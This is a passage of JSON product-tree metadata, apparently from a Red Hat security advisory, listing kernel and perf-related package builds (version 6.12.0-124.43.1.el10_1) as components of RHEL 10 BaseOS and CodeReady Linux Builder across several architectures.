"name": "libperf-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.src as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.src",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch"
},
"product_reference": "kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
